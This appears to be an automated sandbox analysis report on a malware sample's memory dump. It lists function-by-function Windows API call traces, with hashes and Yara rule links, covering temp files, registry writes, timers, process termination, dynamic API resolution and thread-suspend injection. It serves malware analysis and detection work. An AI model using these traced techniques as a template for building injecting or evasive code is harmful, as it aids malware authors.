CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,04629FB8,?), ref: 04636069
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,04629FB8,?,00000000,?,00000000,?,?), ref: 046360DC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 3137ebeebc42ad8784bd7ab40920789b71226b1f5a2a4fc502469b5d1d570cf7
Instruction ID: 496934780716b02db913c1f29e8e6cff648c57637d1159678ac056f30bcafc0c
Opcode Fuzzy Hash: 3137ebeebc42ad8784bd7ab40920789b71226b1f5a2a4fc502469b5d1d570cf7
Instruction Fuzzy Hash: 64110435240724BBDB312B60EC4AF6F3E5CDBD5BA6F001515F60296181FB695C54C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 04631E2D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0463646F: lstrlen.KERNEL32(00000000,00000000,745EC740,73BB81D0,?,?,?,04631E47,253D7325,00000000,745EC740,73BB81D0,?,?,046305C4,00000000), ref: 046364D6
Part of subcall function 0463646F: sprintf.NTDLL ref: 046364F7

lstrlen.KERNEL32(00000000,253D7325,00000000,745EC740,73BB81D0,?,?,046305C4,00000000,05D3C0E0), ref: 04631E58
lstrlen.KERNEL32(?,?,?,046305C4,00000000,05D3C0E0), ref: 04631E60

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

strcpy.NTDLL ref: 04631E77
lstrcat.KERNEL32(00000000,?), ref: 04631E82

Part of subcall function 046369CD: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04631E91,00000000,?,?,?,046305C4,00000000,05D3C0E0), ref: 046369E4

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046305C4,00000000,05D3C0E0), ref: 04631E9F

Part of subcall function 0463248F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04631EAB,00000000,?,?,046305C4,00000000,05D3C0E0), ref: 04632499
Part of subcall function 0463248F: _snprintf.NTDLL ref: 046324F7

Strings

=, xrefs: 04631E99

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 55f35f721bd43d361223413e77d93d59fa8bea08ab340e0228280d3bc6a7c72b
Instruction ID: 30d4c0e1c647dbf9f4670a3e19287bccdf0ebb4e5ec901ef77581dba9b4b5d66
Opcode Fuzzy Hash: 55f35f721bd43d361223413e77d93d59fa8bea08ab340e0228280d3bc6a7c72b
Instruction Fuzzy Hash: 2811C277D012697B9F12BBB49C88CEF3AAEDEC66693054019F50497201FE39ED0187E8

Uniqueness

Uniqueness Score: -1.00%

Function 0462EF5A, Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,04622951), ref: 0462EF85
CloseHandle.KERNEL32(?,?,04622951), ref: 0462EF91
CloseHandle.KERNEL32(00000000,73BCF720,?,0463900A,00000000,?,?,?,04622951), ref: 0462EFA3
memset.NTDLL ref: 0462EFBA
memset.NTDLL ref: 0462EFD1
memset.NTDLL ref: 0462EFE8
memset.NTDLL ref: 0462EFFF

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memset$CloseHandle$SwitchThread
String ID:
API String ID: 3699883640-0
Opcode ID: 381ce529563c86878718386f6b08caa4df222f48f04ac784bcd8eca71a2c5eb6
Instruction ID: 6a319dacbd8d9eedad6622893fa818fc3cce02ddbdb5fb2fcc9dfe4093619f71
Opcode Fuzzy Hash: 381ce529563c86878718386f6b08caa4df222f48f04ac784bcd8eca71a2c5eb6
Instruction Fuzzy Hash: 4211BF3A9408707BEB217B16FC04DCB7E68FBDA705B04002AF004A3251FA296D008AED

Uniqueness

Uniqueness Score: -1.00%

Function 0463D9F7, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0463DA28
wcstombs.NTDLL ref: 0463DA39

Part of subcall function 04636BD9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,?,04622078,00000000,?,00000000,?,?,05D3BB9D,?,?), ref: 04636BEB
Part of subcall function 04636BD9: StrChrA.SHLWAPI(00000004,00000020,?,?,04622078,00000000,?,00000000,?,?,05D3BB9D,?,?), ref: 04636BFA

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0463DA5A
TerminateProcess.KERNEL32(00000000,00000000), ref: 0463DA69
CloseHandle.KERNEL32(00000000), ref: 0463DA70
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0463DA7F
WaitForSingleObject.KERNEL32(00000000), ref: 0463DA8F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 8e7c9be57e547dd9c39db5e90ecf8185d0be1ac6cd2517ebcf89c9bb7f84678a
Instruction ID: 6880075f708a4495d34be0eee99465392187ebff1fd3dccd1414219bff8706a6
Opcode Fuzzy Hash: 8e7c9be57e547dd9c39db5e90ecf8185d0be1ac6cd2517ebcf89c9bb7f84678a
Instruction Fuzzy Hash: D8113A35100655FBEB209F54DD49FAA7B78FF94746F001010F901A2281EBB9EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04625E00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

lstrcpy.KERNEL32(-000000FC,00000000), ref: 04625E3A
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04625E4C
GetTickCount.KERNEL32 ref: 04625E57
GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 04625E63
lstrcpy.KERNEL32(00000000), ref: 04625E7D

Strings

\Low, xrefs: 04625E2C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 1b466f8de94c1b830db539408ec8e676c0c633b7144fb98c9a59c993b24dd275
Instruction ID: 531f757fbfe4f2fbed5115dea29640b0fd03b52bde448c17863e243fb8cfd29a
Opcode Fuzzy Hash: 1b466f8de94c1b830db539408ec8e676c0c633b7144fb98c9a59c993b24dd275
Instruction Fuzzy Hash: 7A01D275601A217FDB302B75AC4CFAF379CEF92691B050124F401D7251FB28E8018AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0462C4B1, Relevance: 10.6, APIs: 7, Instructions: 57memoryregistrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04638EE8,00000000,00000000,046483C0,?,?,0462663A,04638EE8,00000000,04638EE8,046483A0), ref: 0462C4C4
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0462C4D2
wsprintfA.USER32 ref: 0462C4EE
RegCreateKeyA.ADVAPI32(80000001,046483A0,00000000), ref: 0462C506
lstrlen.KERNEL32(?), ref: 0462C515
RegCloseKey.ADVAPI32(?), ref: 0462C52E
HeapFree.KERNEL32(00000000,00000000), ref: 0462C53D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
String ID:
API String ID: 3908752696-0
Opcode ID: 86bc927de89c310464de05f4f9d214293a6611d1afadf6bbe23d610436d3bd17
Instruction ID: 0b648c8e10146100827c22dfc6c7fc86b93fb3e673e75836ad8700a8f8611670
Opcode Fuzzy Hash: 86bc927de89c310464de05f4f9d214293a6611d1afadf6bbe23d610436d3bd17
Instruction Fuzzy Hash: AC11C03A100108FFEF115F94EC89FAA3B7DEBC5715F005021FA0592160FB769D249BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04629FE2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04629FF5
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0462A007
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0462A031
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0462A044
CloseHandle.KERNEL32(?), ref: 0462A04D

Strings

0x%08X, xrefs: 04629FEF

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID: 0x%08X
API String ID: 603522830-3182613153
Opcode ID: 57213b44313a17a250f9eba313fe94257553ae4a9763f1c98c4bd52afcf90134
Instruction ID: ad00c806a81c16998b4168d09813fbcd53e0333916838c8be4e4bd5ccb17bca5
Opcode Fuzzy Hash: 57213b44313a17a250f9eba313fe94257553ae4a9763f1c98c4bd52afcf90134
Instruction Fuzzy Hash: 51015AB5900229BBDB109B90DC0EEEFBF7CFF55765F004155A516E2181EB74AA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462D8D7, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

GetLastError.KERNEL32(?,?,?,00001000,?,04648274,73BCF750), ref: 0462D958
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,04648274,73BCF750), ref: 0462D9DD
CloseHandle.KERNEL32(00000000,?,04648274,73BCF750), ref: 0462D9F7
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,04648274,73BCF750), ref: 0462DA2C

Part of subcall function 04641859: RtlReAllocateHeap.NTDLL(00000000,?,?,04625893), ref: 04641869

WaitForSingleObject.KERNEL32(?,00000064,?,04648274,73BCF750), ref: 0462DAAE
CloseHandle.KERNEL32(F0FFC983,?,04648274,73BCF750), ref: 0462DAD5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 80f7f628d23a5a9d62f5f4fb3f0b2de67d7b15c2b4ec99df520bd999dc75eadc
Instruction ID: a5acc4a065ef8978488af2f7b1f74fae6737503d0580e69edfd7371ca3800603
Opcode Fuzzy Hash: 80f7f628d23a5a9d62f5f4fb3f0b2de67d7b15c2b4ec99df520bd999dc75eadc
Instruction Fuzzy Hash: BB814471E00629FFDF11CF98CA84AADBBB5FF48754F148459E905AB250E730AA50CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04633F66, Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

FileTimeToLocalFileTime.KERNEL32(00000000,046330CD), ref: 04633FC8
FileTimeToSystemTime.KERNEL32(046330CD,?), ref: 04633FD6
lstrlenW.KERNEL32(00000010), ref: 04633FE6
lstrlenW.KERNEL32(00000218), ref: 04633FF2
FileTimeToLocalFileTime.KERNEL32(00000008,046330CD), ref: 046340DF
FileTimeToSystemTime.KERNEL32(046330CD,?), ref: 046340ED

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Time$File$LocalSystemlstrlen$AllocateHeap
String ID:
API String ID: 1122361434-0
Opcode ID: f53380c55b9ff9f85532f80e2c9f269b2691f84aabb83ca4e9e020e506de5276
Instruction ID: 82f3528311ff4047ff4c494ee2eb5c4a8b91bd137d872f6a43f74c521a993250
Opcode Fuzzy Hash: f53380c55b9ff9f85532f80e2c9f269b2691f84aabb83ca4e9e020e506de5276
Instruction Fuzzy Hash: C1711D71A0065AAFDB10DFA8C984AEEB7FCFB48305F00446AE505D7241FB38A945DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0462E3A8, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0462E3CB

Part of subcall function 04640D2F: GetModuleHandleA.KERNEL32(4E52454B,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D50
Part of subcall function 04640D2F: GetProcAddress.KERNEL32(00000000,6F577349), ref: 04640D69
Part of subcall function 04640D2F: OpenProcess.KERNEL32(00000400,00000000,0462E3EB,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D86
Part of subcall function 04640D2F: IsWow64Process.KERNEL32(00000000,00000000,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D97
Part of subcall function 04640D2F: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640DAA

ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,046480F0,?,00000000), ref: 0462E485
WaitForSingleObject.KERNEL32(00000064), ref: 0462E493
SuspendThread.KERNEL32(?), ref: 0462E4A6

Part of subcall function 04630AB1: memset.NTDLL ref: 04630D7B

ResumeThread.KERNEL32(?), ref: 0462E529

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: 8d72794486a95bbe1cb29119eecfec0ad858b8f113cd61e2acb3839954c8e84c
Instruction ID: dade6d9a02f239162f4b1e529ab96c7a60d3c3e2b19a1a47e4667a2f423b52a7
Opcode Fuzzy Hash: 8d72794486a95bbe1cb29119eecfec0ad858b8f113cd61e2acb3839954c8e84c
Instruction Fuzzy Hash: 6C41AD71900669BBEF119F94CE84AAE7BB9EF54304F044469E905A7210FB36EE51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0462E003, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0462E01C

Part of subcall function 04639117: lstrlenW.KERNEL32(00000000,00000000,00000094,50504125,00000000,?,?,0462E03C,?), ref: 04639143
Part of subcall function 04639117: RtlAllocateHeap.NTDLL(00000000,?), ref: 04639155
Part of subcall function 04639117: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0462E03C,?), ref: 04639172
Part of subcall function 04639117: lstrlenW.KERNEL32(00000000,?,?,0462E03C,?), ref: 0463917E
Part of subcall function 04639117: HeapFree.KERNEL32(00000000,00000000,?,?,0462E03C,?), ref: 04639192

RtlEnterCriticalSection.NTDLL(00000000), ref: 0462E054
CloseHandle.KERNEL32(?), ref: 0462E062
HeapFree.KERNEL32(00000000,?,?,00000001,0065002E,?,00001000,?,?,00001000), ref: 0462E13B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0462E14A
HeapFree.KERNEL32(00000000,00000000,0065002E,?,00001000,?,?,00001000), ref: 0462E15D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1719504581-0
Opcode ID: 8d43413d9b1c793ecdea8c71867c04d497b1b811142fd36a28ca4c0c6eaa9054
Instruction ID: e3bc178f22a6f3e4b22b770ba5a207d85b525d9497eefb3f5b622a18e624d552
Opcode Fuzzy Hash: 8d43413d9b1c793ecdea8c71867c04d497b1b811142fd36a28ca4c0c6eaa9054
Instruction Fuzzy Hash: CF41AE3A600A25FBDF219F94C988B9A7B79EB94704F004039E905A7310FB76BD55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463CAB5, Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?), ref: 0463CB10
GetLastError.KERNEL32 ref: 0463CB36
SetEvent.KERNEL32(00000000), ref: 0463CB49
GetModuleHandleA.KERNEL32(00000000), ref: 0463CB92
memset.NTDLL ref: 0463CBA7
RtlExitUserThread.NTDLL(?), ref: 0463CBDC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID:
API String ID: 3978817377-0
Opcode ID: cae24a9273b0a2725d0c5034fcdb8fde8ec8520a2ec922f126b75a81d0e8d7bd
Instruction ID: 2a65b91549b6d44d5364e76fcefaba4a8dfd4caa02d426933393ec2a4e54f5b4
Opcode Fuzzy Hash: cae24a9273b0a2725d0c5034fcdb8fde8ec8520a2ec922f126b75a81d0e8d7bd
Instruction Fuzzy Hash: 5A415E76900644AFCB21DF68DC88CAABBBDEF857167245599F946E3200F735AD44CB20

Uniqueness

Uniqueness Score: -1.00%

Function 046385FA, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647e1ab4cff8e8c8c5249f3db728b38a4d08a75eac5bdd94ac9f8f91bdfb3970
Instruction ID: da7cb639730c28205b2ee78561d76469a07bed2fcfeb94e7c07bfa20799e53e2
Opcode Fuzzy Hash: 647e1ab4cff8e8c8c5249f3db728b38a4d08a75eac5bdd94ac9f8f91bdfb3970
Instruction Fuzzy Hash: C141D4B5500750AFD730BF768C8999FBBF9FB84366B000A2DF66683680F770A8058B51

Uniqueness

Uniqueness Score: -1.00%

Function 0463DB0E, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0463DB28
CreateWaitableTimerA.KERNEL32(04648168,00000003,?), ref: 0463DB45
GetLastError.KERNEL32(?,?,04626B20,?), ref: 0463DB56

Part of subcall function 04626213: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 0462624B
Part of subcall function 04626213: RtlAllocateHeap.NTDLL(00000000,?), ref: 0462625F
Part of subcall function 04626213: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626279
Part of subcall function 04626213: RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 046262A3

GetSystemTimeAsFileTime.KERNEL32(?,00000000,04626B20,?,?,?,04626B20,?), ref: 0463DB96
SetWaitableTimer.KERNEL32(?,04626B20,00000000,00000000,00000000,00000000,?,?,04626B20,?), ref: 0463DBB5
HeapFree.KERNEL32(00000000,04626B20,00000000,04626B20,?,?,?,04626B20,?), ref: 0463DBCB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: a31ec81d4158177d9ac731f6ce8c217ca0fc8ca21a6f4c1d2404f09975a669d4
Instruction ID: de63eca0d68b337c313b5f774db0e138cbb238af75835e8dc88befc84c3057ba
Opcode Fuzzy Hash: a31ec81d4158177d9ac731f6ce8c217ca0fc8ca21a6f4c1d2404f09975a669d4
Instruction Fuzzy Hash: 823128B5D00258FBCF61EF95C989DAFBBB9FB94752F108495E506A7200F734AA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04633C0E, Relevance: 9.1, APIs: 6, Instructions: 87memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000104,046429F7,00000000,?,?,0462980E,?,?,?,00000000), ref: 04633C2A
lstrlen.KERNEL32(?,00000104,046429F7,00000000,?,?,0462980E,?,?,?), ref: 04633C40
lstrlen.KERNEL32(?,00000104,046429F7,00000000,?,?,0462980E,?,?,?), ref: 04633C55
RtlAllocateHeap.NTDLL(00000000,?,00000104), ref: 04633CB0
_snprintf.NTDLL ref: 04633CD6
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 04633CF5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateFree_snprintf
String ID:
API String ID: 3180502281-0
Opcode ID: b00ec492514d801eb17efbf84c522f9c3663a1435971ee576cc3cba0a796906b
Instruction ID: f58384857baf43529ecd3fe2a96a286ee0f0f113ab794bc4d4d3b25ae9828879
Opcode Fuzzy Hash: b00ec492514d801eb17efbf84c522f9c3663a1435971ee576cc3cba0a796906b
Instruction Fuzzy Hash: 4031B476500249FFCF11AF58CC8199E3BA9FB84756B048025FD01A7200E774AE60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04624248, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00008664,?,0462E4FE,0462E4FE,?,04630BCB,?,0462E4FE,?,?,00000000), ref: 0462426D
GetProcAddress.KERNEL32(00000000,7243775A), ref: 0462428F
GetProcAddress.KERNEL32(00000000,614D775A), ref: 046242A5
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046242BB
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046242D1
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046242E7

Part of subcall function 0462F4CF: memset.NTDLL ref: 0462F550

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: a498a11f4cceef0aadf4ff5363204bed6aa122785565cd780ba44225b801b5ef
Instruction ID: c972ab41b8ae334d2189bbc4bb6be0fe38688038c3f1dbe33f699613f8b4b3cf
Opcode Fuzzy Hash: a498a11f4cceef0aadf4ff5363204bed6aa122785565cd780ba44225b801b5ef
Instruction Fuzzy Hash: 0F2148B5600A1AAFDB20EF6AC944D5BB7ECEFA67147009426E408C7301FB74F9048F60

Uniqueness

Uniqueness Score: -1.00%

Function 04630025, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,0463BCB8,00000000,?,0464807C,?,?,046480F0), ref: 0463003D
StrChrA.SHLWAPI(00000001,00000020,?,?,?,0463BCB8,00000000,?,0464807C,?,?,046480F0), ref: 0463004E

Part of subcall function 0463DAA8: lstrlen.KERNEL32(?,?,00000000,00000000,?,0462133B,00000000,65666552,?,00000000,00000001), ref: 0463DABA
Part of subcall function 0463DAA8: StrChrA.SHLWAPI(?,0000000D,?,0462133B,00000000,65666552,?,00000000,00000001), ref: 0463DAF2

RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 0463008E
memcpy.NTDLL(00000000,70747468,00000007,?,?,?,0463BCB8,00000000,?,0464807C,?), ref: 046300BB
memcpy.NTDLL(00000000,046480F0,046480F0,00000000,70747468,00000007,?,?,?,0463BCB8,00000000,?,0464807C,?), ref: 046300CA
memcpy.NTDLL(046480F0,?,?,00000000,046480F0,046480F0,00000000,70747468,00000007,?,?,?,0463BCB8,00000000,?,0464807C), ref: 046300DC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 026b2f53666e572f8016a7e153bac21ac5db09b9ddf425b2d08f178636e20571
Instruction ID: e7ed6dcedb28f0a811f9494853cbfb71c228e17e567757ff9aa5cdc313aa13f0
Opcode Fuzzy Hash: 026b2f53666e572f8016a7e153bac21ac5db09b9ddf425b2d08f178636e20571
Instruction Fuzzy Hash: A9218E72500619BFDF109FA8CC84F9A7BACEF59748F048052E904AB251F774FD448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463D3EB, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 0463D42A
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0463D43B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 0463D456
GetLastError.KERNEL32 ref: 0463D46C
HeapFree.KERNEL32(00000000,?), ref: 0463D47E
HeapFree.KERNEL32(00000000,?), ref: 0463D493

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 3fb84fe3d3175a990a98c803c1d9515e63c853639c20015bf4881d0d2596d896
Instruction ID: 8e504f875ad9682717df05021b598d962c62da40358f29fe89f4eefd146ebca1
Opcode Fuzzy Hash: 3fb84fe3d3175a990a98c803c1d9515e63c853639c20015bf4881d0d2596d896
Instruction Fuzzy Hash: 62117C7A901128BBDF225B92DC08CEF7F7EEF857A1F004021F505A2151E6366A61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462265D, Relevance: 9.1, APIs: 6, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?), ref: 0462267B
RegQueryValueExA.ADVAPI32(?,6E69614D,00000000,?,00000000,?), ref: 046226A9
RtlAllocateHeap.NTDLL(00000000,?), ref: 046226BB
RegQueryValueExA.ADVAPI32(?,6E69614D,00000000,?,00000000,?), ref: 046226E0
HeapFree.KERNEL32(00000000,00000000), ref: 046226FD
RegCloseKey.ADVAPI32(?), ref: 04622707

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID:
API String ID: 170146033-0
Opcode ID: 673c0ec3deccbf93109154ed1a4e6dd9c9e896475a43b272d607526d1c62a034
Instruction ID: 7182ef510940e4c6a3a988ab8938a81b50b83897688375864723fc0e274d8d4d
Opcode Fuzzy Hash: 673c0ec3deccbf93109154ed1a4e6dd9c9e896475a43b272d607526d1c62a034
Instruction Fuzzy Hash: 6221C77A900118FFDF11EBA8DD84DAEBBFDEB89605B1050A6E901E2110E735AE159F20

Uniqueness

Uniqueness Score: -1.00%

Function 04621000, Relevance: 9.1, APIs: 6, Instructions: 67memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 04621011
lstrlen.KERNEL32(?), ref: 04621018
RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0462102A
_snprintf.NTDLL ref: 04621050

Part of subcall function 0463990C: memset.NTDLL ref: 04639921
Part of subcall function 0463990C: lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000020,00000000), ref: 0463995C
Part of subcall function 0463990C: wcstombs.NTDLL ref: 04639966
Part of subcall function 0463990C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000020,00000000), ref: 0463999A
Part of subcall function 0463990C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399C6
Part of subcall function 0463990C: TerminateProcess.KERNEL32(?,000003E5), ref: 046399DC
